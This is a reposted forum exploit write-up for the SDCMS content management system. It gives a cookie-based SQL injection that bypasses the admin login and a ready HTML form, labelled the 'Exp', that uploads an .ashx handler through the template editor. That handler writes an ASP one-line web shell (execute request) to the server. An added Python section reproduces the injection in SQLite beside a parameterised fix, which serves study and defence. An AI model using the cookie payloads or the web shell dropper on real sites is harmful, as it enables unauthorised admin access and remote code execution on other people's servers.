Reposted from: http://t00ls.net/thread-13767-1-1.html, original author: st4nd

First, capture the request to the following URL with LiveHTTPHeaders to obtain the cookie values:

    http://192.168.248.129/admin/index.asp?Action=out

COOKIE:

   1Rq4Qz6We6Dbsdcms%5Finfolever=; 1Rq4Qz6We6Dbsdcms%5Falllever=; 1Rq4Qz6We6Dbsdcms%5Fadmin=; 1Rq4Qz6We6Dbsdcms%5Fpwd=; 1Rq4Qz6We6Dbsdcms%5Fname=; 1Rq4Qz6We6Dbsdcms%5Fid=; ASPSESSIONIDCQDBQTAD=BHPFKHJBDBOIPLOMALGOMFAA

The login query:

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='"&sdcms_adminname&"' And sdcms_pwd='"&sdcms_adminpwd&"'"

With the injected username it becomes:

   Sql="select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='stcms' or '1'='1' or '1'='1' And sdcms_pwd='LAONA'"

The username can be obtained from the front end:

    stcms%27%20or%20%271%27%3D%271%27%20or%20%271%27%3D%271
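As an added illustration that is not part of the original post, the concatenated query above is reproduced over an in-memory SQLite table and placed beside a parameterised version; the table, its single row and the password "123" are constructed, and the injected name is the cookie value from the write-up.

```python
import sqlite3

# Constructed stand-in for the sd_admin table; SQLite replaces the CMS's own database.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("create table sd_admin (sdcms_name text, sdcms_pwd text)")
    db.execute("insert into sd_admin values ('stcms', 'LAONA')")
    return db

def vulnerable_login(db, name, pwd):
    # Same string concatenation as the ASP code: cookie values land directly in the SQL text,
    # so quotes inside them change the statement. Returns True when a row matches.
    sql = ("select sdcms_name,sdcms_pwd from sd_admin where sdcms_name='" + name
           + "' And sdcms_pwd='" + pwd + "'")
    return db.execute(sql).fetchone() is not None

def safe_login(db, name, pwd):
    # Parameterised form: the cookie values are bound as data, never parsed as SQL,
    # so the same input is matched literally against the stored name.
    sql = "select sdcms_name,sdcms_pwd from sd_admin where sdcms_name=? and sdcms_pwd=?"
    return db.execute(sql, (name, pwd)).fetchone() is not None

# The sdcms_name cookie value from the write-up. In the concatenated query the trailing
# "or '1'='1'" is always true, and OR binds looser than AND, so the password check is bypassed.
INJECTED_NAME = "stcms' or '1'='1' or '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("concatenated query, wrong password:", vulnerable_login(db, INJECTED_NAME, "123"))
    print("parameterised query, wrong password:", safe_login(db, INJECTED_NAME, "123"))
```

The parameter binding only closes the injection; the 1Rq4Qz6We6Dbsdcms_admin=1 cookie set later in the write-up is a separate problem, since admin state is trusted from a client-controlled cookie rather than from server-side session data.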

Use a cookie editor to modify the cookie:

    1Rq4Qz6We6Dbsdcms%5Fpwd=123; 1Rq4Qz6We6Dbsdcms%5Fname=stcms' or '1'='1' or '1'='1;1Rq4Qz6We6Dbsdcms%5Fadmin=1;1Rq4Qz6We6Dbsdcms%5Fid=1;

Then open:

    http://192.168.248.129/admin/sdcms_template.asp?action=add&Path=2009

Or use the fuck.html below directly.

It's really just a cookie, or just go into the admin backend. Tested on a Windows 2003 VM... if it doesn't work, pretend I never posted this...

fuck.html source [Exp]:

<table width="98%" border="0" align="center" cellpadding="3" cellspacing="1">
  <form name="add" id="add" method="post" action="http://192.168.248.129/admin/sdcms_template.asp?action=save&t3=True&Path=2009" onSubmit="return checkadd()">
    <tr>
      <td width="120" align="center" class="tdbg">目 录:      </td>
      <td class="tdbg">../Skins/2009/</td>
    </tr>
        <tr>
      <td align="center" class="tdbg">文件名:      </td>
      <td class="tdbg"><input name="t0" type="text" class="input" value="0x255.ashx" id="t0" size="40"> <span>格式:sdcms_index.htm</span></td>
    </tr>
        <tr class="tdbg">
      <td align="center">内容:</td>
      <td><textarea id="t1" name="t1" class="inputs" rows="20">GIF8A
<%@ WebHandler Language="C#" Class="Handler" %>

using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {

public void ProcessRequest (HttpContext context) {
       context.Response.ContentType = "text/plain";
     
       StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
       file1.Write("<%response.clear:execute request(\"0x255.com\"):response.End%>");
       file1.Flush();
       file1.Close();
     
}

public bool IsReusable {
       get {
         return false;
       }
}

}

</textarea></td>
    </tr>
    <tr class="tdbg">
          <td>&nbsp;</td>
      <td><input type="submit" class="bnt" value="保存设置"> <input type="button" onClick="history.go(-1)" class="bnt" value="放弃返回"></td>
    </tr>
        </form>
  </table>